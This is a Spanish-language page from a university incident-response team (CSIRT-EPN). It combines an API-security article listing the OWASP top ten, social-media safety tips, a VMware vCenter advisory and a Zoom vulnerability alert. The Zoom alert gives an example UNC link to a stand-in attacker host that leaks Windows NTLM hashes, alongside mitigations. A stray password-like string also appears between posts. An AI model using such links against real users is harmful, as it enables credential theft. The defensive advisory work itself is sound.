esenfrdeitptru

Guías y mejores prácticas

Factores que impulsan el crecimiento de la API en la industria

Fecha: 01/06/2020

Autor: Edward Amoroso, CEO, TAG Cyber
Colaboración: Matthew Keil, Director de Product Marketing, Cequence.

Resumen:

Este es el tercer artículo de una serie, que presenta y explica las amenazas, desafíos y soluciones de seguridad de las interfaces de programación de aplicaciones (API), para los participantes en el desarrollo, operaciones y protección de software.

 

Objetivo.


Brindar el conocimiento de cómo las mayores empresas de ventas en Internet rompieron las murallas de sus sistemas con un modelo conector uniforme. Utilizando un nuevo estilo de programación, con una técnica conocida como Representational State Transfer o REST, dando lugar a la invención de las API-REST, definiendo a la API como un estilo arquitectónico y de diseño de arquitecturas de software basado en Red.


Explosión de la API


La explosión de la API también está impulsada por varios factores orientados al negocio. En primer lugar, las empresas se están alejando de las grandes aplicaciones monolíticas que se actualizan anualmente. En su lugar, las aplicaciones heredadas y nuevas se dividen en componentes pequeños y funcionalmente independientes, a menudo se implementan como microservicios basados en contenedores. Los componentes de aplicación y los microservicios resultantes trabajan juntos para ofrecer la misma funcionalidad que las aplicaciones monolíticas.

Lo que permite mantener todo esto junto, por supuesto, son las API que permiten la comunicación entre procesos, el intercambio bidireccional de datos y la prestación de servicios en tiempo real. Al servir como puente entre aplicaciones, componentes, microservicios y otros contenedores de cargas de trabajo, las API pueden ser consideradas como porciones grandes de integración del Internet, incluido el comercio electrónico, el procesamiento de la cadena de suministro, las interacciones comerciales y otros componentes de la economía digital moderna.

En un nivel más técnico, los factores que han ayudado a que las API sean tan generalizadas en el diseño e implementación de servicios de Internet son los siguientes:


Compatibilidad con DevOps. Las metodologías de desarrollo iterativas como DevOps, DevSecOps y Agile permiten a los equipos insertar cambios incrementales directamente en los clientes en lugar de utilizar largos ciclos de seguridad y desarrollo.


• Flexibilidad bajo demanda. el hospedaje de aplicaciones modernas requiere la capacidad de escalar o reducir los servicios, bajo demanda, de una manera rentable y eficiente, para manejar los cambios en los patrones de uso, como la demanda estacional.


Marcos de desarrollo (frameworks): las tendencias de adopción de tecnología, como el aumento del uso de la nube, los contenedores y la orquestación (como Kubernetes) y los marcos de administración (como Istio), facilitan el desarrollo e implementación de microservicios basados en API a escala.


Ecosistema diverso. la expansión del ecosistema de partners, habilitada por microservicios basados en API, permite que los agregadores, proveedores y desarrolladores externos lo utilicen para hacer crecer su negocio sin replicar la funcionalidad. Estas API están bien documentadas y disponibles públicamente, como lo demuestra el enorme directorio de más de 23.000 API que se pueden encontrar en Internet.


El incremento de la adopción de API es una gran noticia para las empresas, pero presenta los desafíos correspondientes para los profesionales de la seguridad. Los equipos empresariales que podrían haber sido encargados anteriormente, de la protección de un puñado de aplicaciones, ahora podrían ser repentinamente responsables de proteger cientos o miles de API públicas con una serie de riesgos de seguridad cibernética. Como resultado, la seguridad de la API se ha convertido en un problema de primer nivel para la mayoría de los CISOs.

Los 10 riesgos principales del OWASP

La Open Web Application Security Project (OWASP) Foundation fue creada para mejorar la seguridad del software a través de iniciativas de la comunidad. Su producto más famoso es el llamado “OWASP top ten risks”, que se publica para ayudar a los desarrolladores de software a evitar los riesgos más comunes en la creación y el uso de aplicaciones web. Se enumera a continuación una descripción de los diez principales riesgos de OWASP:

1. Inyección. Los errores de inyección, como la inyección de SQL, NoSQL, el sistema operativo y LDAP, se producen cuando datos no confiables son enviados a un intérprete como parte de un comando o consulta. Los datos hostiles del atacante pueden engañar al intérprete para que ejecute comandos no deseados o acceda a los datos sin la autorización adecuada.


2. Autenticación rota. Las funciones de aplicación relacionadas con la autenticación y la administración de sesiones a menudo se implementan incorrectamente, lo que permite a los atacantes comprometer la contraseñas, claves o tokens de sesión, o aprovechar otros defectos de implementación para asumir las identidades de otros usuarios de forma temporal o permanente.


3. Exposición de datos sensibles. Muchas aplicaciones web y las APIs no protegen adecuadamente los datos confidenciales, tales como los financieros, los datos de salud, entre otros. Los atacantes pueden robar o modificar los datos débilmente protegidos para llevar a cabo fraudes con tarjetas de crédito, robo de identidad u otros delitos. Los datos confidenciales pueden verse comprometidos sin la protección adicional, como el cifrado en reposo o en tránsito, y requieren precauciones especiales cuando se intercambian con el navegador.


4. Entidades externas XML (XXE). Muchos procesadores XML viejos o mal configurados evalúan las referencias de entidades externas en documentos XML. Las entidades externas se pueden usar para revelar archivos internos mediante el controlador de archivo URI, recursos compartidos de archivos internos, análisis de puertos internos, ejecución remota de código y ataques de denegación de servicio.

5. Control de acceso roto. Las restricciones sobre lo que los usuarios autenticados pueden hacer a menudo no se aplican correctamente. Los atacantes pueden explotar estos defectos para acceder a funciones y/ o datos no autorizados, tales como acceder a cuentas de otros usuarios, ver archivos confidenciales, modificar los datos de otros usuarios, cambiar los derechos de acceso, etc.


6. Configuración incorrecta de seguridad. La configuración incorrecta de seguridad es el problema más común. Esto suele ser el resultado de configuraciones predeterminadas inseguras, configuraciones incompletas o ad hoc, almacenamiento en la nube abierto, encabezados HTTP mal configurados y mensajes de error detallados que contienen información confidencial. No solo todos los sistemas operativos, frameworks, bibliotecas y aplicaciones deben configurarse de forma segura, sino que deben estar parchados o actualizados de forma oportuna.


7. Cross-Site Scripting (XSS). Los defectos de XSS se producen siempre que una aplicación incluye datos no confiables en una nueva página web sin una validación o escape adecuados, o actualiza una página web con datos proporcionados por el usuario mediante una API de navegador que puede crear HTML o JavaScript. XSS permitiendo a los atacantes ejecutar scripts en el navegador de la víctima que pueden secuestrar sesiones de usuario, desfigurar sitios web, o redirigir al usuario a sitios maliciosos.


8. Deserialización insegura. La deserialización insegura a menudo permite la ejecución remota de código. Incluso si los defectos de deserialización no dan lugar a la ejecución remota de código, se pueden usar para realizar: ataques de reproducción, ataques de inyección y ataques de escalamiento de privilegios.


9. Uso de componentes con vulnerabilidades conocidas. Los componentes, como bibliotecas, frameworks, y otros módulos de software, se ejecutan con los mismos privilegios que la aplicación. Si se explota un componente vulnerable, un ataque de este tipo puede facilitar la pérdida de datos o la toma del servidor. Las aplicaciones y las APIs que utilizan componentes con vulnerabilidades conocidas pueden debilitar las defensas de las aplicaciones y permitir diversos ataques e impactos.


10. Supervisión de logs insuficiente. La supervisión de logs insuficiente, junto con la integración no efectiva o una ineficaz respuesta a incidentes, permiten que los atacantes vulneren los sistemas, mantengan la persistencia, manipulen los sistemas, extraer o destruir los datos. La mayoría de los estudios de incumplimiento muestran que el tiempo para detectar una violación es de más de 200 días, normalmente detectados por partes externas en lugar de procesos internos o monitoreo.

Seguridad en DevOps

El modelo de cascada del desarrollo de software se ha convertido en una víctima del tiempo. Es decir, la duración entre definir los requisitos de software y el tiempo que se entrega el código funcional se ha vuelto demasiado larga para la mayoría de los entornos prácticos. De hecho, cuando un proyecto de cascada se mueve a la codificación, los requisitos a menudo ya han cambiado tanto, que lo convierte en una actividad irrelevante. Dado que los cambios de requisitos suelen originarse con los usuarios finales, es poco probable que la situación cambie.

Para hacer frente a este ciclo de vida acelerado, los llamados procesos de DevOps han surgido en la comunidad de software. Diseñados para abordar el creciente ritmo de cambio de requisitos, DevOps implica tareas rápidamente organizadas y ejecutadas con un diseño acelerado para producir e implementar nuevos requisitos velozmente. La integración entre los codificadores (la parte de desarrollo) y los usuarios de producción (la parte Operaciones) crea un ciclo espiral interminable de desarrollo de software que se realiza mejor con un soporte automatizado.

La solución al desafío de seguridad de DevOps es la automatización. Solo a través de la introducción de controles automatizados para tareas como pruebas de seguridad, análisis de código, supervisión de control y registro de actividad, se puede mantener la velocidad de DevOps, al tiempo que se garantiza que las vulnerabilidades no se introducen como resultado del proceso. Obviamente, el código con errores con brechas explotables seguirán apareciendo, pero estos no deben introducirse como resultado del proceso.
Una nota interesante y curiosa que vale la pena mencionar es que la comunidad no ha acordado una nomenclatura estándar para los procesos de DevOps seguros. Se podría encontrar referencias a DevSecOps, SecDevOps y DevOpsSec - y este autor no tiene ningún buen consejo para identificar las diferencias. Se aconseja a los lectores que interactúen con el equipo de seguridad al principio del proceso de desarrollo de aplicaciones para fomentar una estrecha relación de trabajo

 

Referencia:


https://www.helpnetsecurity.com/2020/06/01/api-explosion/

BUENAS PRÁCTICAS DE SEGURIDAD EN EL USO DE REDES SOCIALES

BUENAS PRÁCTICAS DE SEGURIDAD EN EL USO DE REDES SOCIALES

Fecha: 17/04/2020

Las redes sociales son en la actualidad el vínculo entre una organización y su comunidad. Los riesgos existentes en el ciberespacio podrían afectar la imagen institucional o personal si un atacante toma el control de la cuenta de la red social, publicando información falsa, maliciosa o mal intencionada.

Las siguientes recomendaciones son indispensables acatarlas en el uso de redes sociales:

1. Apegarse a las directrices institucionales de contraseñas, la clave para acceder a redes sociales debe seguir similares directrices, es decir debe ser construida con una longitud de 10 caracteres, letras, números y símbolos, esta clave no utilizarla en los sistemas institucionales, ni sistemas financieros.

2. Configurar la cuenta de acceso a las redes sociales con doble factor de autenticación, es decir que requiera algún código de verificación enviado a un número de teléfono o a un correo electrónico.

3. Utilice su intuición o si sospecha de que una noticia es falsa, o tiene enlaces a sitios desconocidos, no de click, peor aún entregue información personal o contraseñas de acceso.

4. Animamos a los padres de familia de nuestra comunidad politécnica, a que eduquen a sus hijos en el uso de prácticas de Internet seguras. Por favor evitar publicar fotos con su hijos menores.

5. Encuentre un equilibrio entre lo que significa ofrecer un lugar en el que pueda expresarse con empatía y respeto a la vez promueva un entorno seguro y acogedor para todos.

6. Si sospecha que ha sido víctima de un atacante cibernético, notifique a gestióEsta dirección de correo electrónico está siendo protegida contra los robots de spam. Necesita tener JavaScript habilitado para poder verlo.

7. En computadoras así como también teléfonos móviles, tabletas, entre otros, utilice aplicaciones de seguridad que requieran contraseña para acceder a las redes sociales.

8. No grabar las contraseñas en los dispositivos que utilice, debe ser común que deba ingresar la contraseña para iniciar sesión.

9. Si observa que su cuenta ha sido clonada o hackeada repórtelo siguiendo las directrices que dan las redes sociales para el efecto:

Ayuda para reportar cuentas hackeadas, suplantación de identidad, cuentas ficticias: https://www.facebook.com/hacked;

Denunciar una cuenta comprometida: https://www.facebook.om/help/hacked

Denunciar suplantación de cuenta Twitter:

https://help.twitter.com/en/safety-and-security/report-twitter-impersonation

 

Referencia: https://www.facebook.com/about/privacy/minors

 

CSIRT-EPN

Vulnerabilidad de VMWare en su servicio de directorio

Alerta: VMWre Publica actualizaciones de seguridad para el servicio VMware Directory

 

Fecha: 13/04/2020

 

Severidad: Crítica

VMware ha publicado actualizaciones de seguridad para abordar una vulnerabilidad del servicio de directorio de VMware (vmdir). Un atacante puede aprovechar esta vulnerabilidad y tomar control de un sistema afectado.

Bajo determinadas condiciones el vmdir que se registra con VMware vCenter Server, como parte de una instancia de Platform Services Controller (PSC) integrada o externa, no implementa correctamente los controles de acceso.

 

Producto afectado: VMware vCenter Server. El VCenter Server versión 7 no está afectado.

 

Solución

Parchar la versión del producto afectado según la tabla referenciada en el siguiente enlace:  https://www.vmware.com/security/advisories/VMSA-2020-0006.html

 

Referencias

https://www.vmware.com/security/advisories/VMSA-2020-0006.html

https://nvd.nist.gov/vuln/detail/CVE-2020-3952#vulnCurrentDescriptionTitle

CSIRT-EPN

 

Lc3WC1S445*rd$

Vulnerabilidad ZOOM

ALERTA VULNERABILIDAD EN ZOOM

Fecha: 1 de abril de 2020

"En las últimas semanas, la crisis de COVID-19 ha significado que millones de personas se queden en casa trabajando. Las estimaciones varían, pero hasta el 50% de los empleados en todo el mundo ahora pueden trabajar de forma remota. Plataformas de comunicaciones en línea se han vuelto esenciales para las interacciones personales y comerciales con el resto del mundo, y con una participación de mercado global cercana al 20%, Zoom es una de las plataformas más populares ".

 

Patrick Wardle, un ex hacker informático de la NSA (National Security Agency), determina dos errores de Zoom, que se puede utilizar para robar contraseñas de Windows, el segundo error explota una falla en cómo Zoom maneja la cámara web y el micrófono en las Mac permitiendo tomar control de los mismos.

 

Los ataques funcionan mediante el uso de la ventana de chat Zoom para enviar a los objetivos una cadena de texto que representa la ubicación de red en el dispositivo Windows que están utilizando. La aplicación Zoom para Windows convierte automáticamente las llamadas cadenas de convenciones de nomenclatura universales, como \\ attacker.example.com/C$, en enlaces en los que se puede hacer clic. En el caso de que los objetivos hagan clic en esos enlaces en redes que no están completamente bloqueadas, Zoom enviará los nombres de usuario de Windows y los hashes NTLM correspondientes a la dirección contenida en el enlace a través del puerto 445, que se utiliza para transmitir el tráfico relacionado con los servicios de Windows SMB y Active Directory. Se indica que la empresa ZOOM ha lanzado una actualización de la aplicación.

 

Recomendaciones

  1. Mantener actualizada la aplicación: https://support.zoom.us/hc/en-us/articles/20131953-New-Updates-for-Windows .
  2. Evite dar a conocer sus clases o reuniones a través de las redes sociales.
  3. Usar contraseña de inicio de sesión, evitar utilizar el envío de invitación a través de la URL de la reunión, ya que esta opción no requiere contraseña.
  4. Administrar a los participantes, restringiendo el uso de cámara, micrófono y el compartir archivos.
  5. Administrar los participantes que pueden grabar la conversación.
  6. En la directiva de seguridad de red de Windows, restringir NTLM: tráfico saliente hacia servidores remotos.
  7. Bloquear el puerto 445.
  8. Permitir que solo usuarios registrados se unan a sus reuniones.
  9. Bloquear la reunión una vez comenzada.
  10. Eliminar participantes no deseados o perjudiciales.
  11. Evitar que los participantes eliminados vuelvan a unirse.
  12. Desactivar la transferencia de archivos.
  13. Desactivar anotación.
  14. Poner en espera a los participantes que producen una ruptura brusca.
  15. Deshabilitar chat privado.

 

Referencias

Cómo Citarnos

Castellano: CSIRTEPN - Grupo  Respuesta a Incidentes de Seguridad de la Escuela Politécnica Nacional

Otro idioma: CSIRTEPN – National Polytechnic School Computer Emergency Response Team

Concepto de incidente

“Evento inesperado que compromete la operación de un sistema y su información, amenazando la confidencialidad, integridad o disponibilidad”

Ver Lista de incidentes

Contáctenos

Para contactarse con nosotros y resolver tus dudas o inquietudes, escríbenos a:

Correo:team@csirt-epn.edu.ec

Dirección: Madrid y Toledo Edificio de Aulas y Relación con el Medio Externo (EARME)
Planta Baja (Centro de Datos)

Teléfono: (+593) 22976300 Ext. 1436, 1452, 1453

Horario de Atención: De lunes a Viernes de 8H00 - 18H00

 

Reportar Incidente

Puedes reportar tu incidente de los siguiente forma:

Escribenos al correo: gestion.incidentes@csirt-epn.edu.ec

Comunícate con nostros al: (593) 2 2976 300 ext 1452 1453

Repórtalo desde nuestro formulario aquí

No olvides incluir:

  • Nombres completos.
  • Correo electrónico
  • Teléfono – extensión
  • Dependencia-oficina
  • Comentario del incidente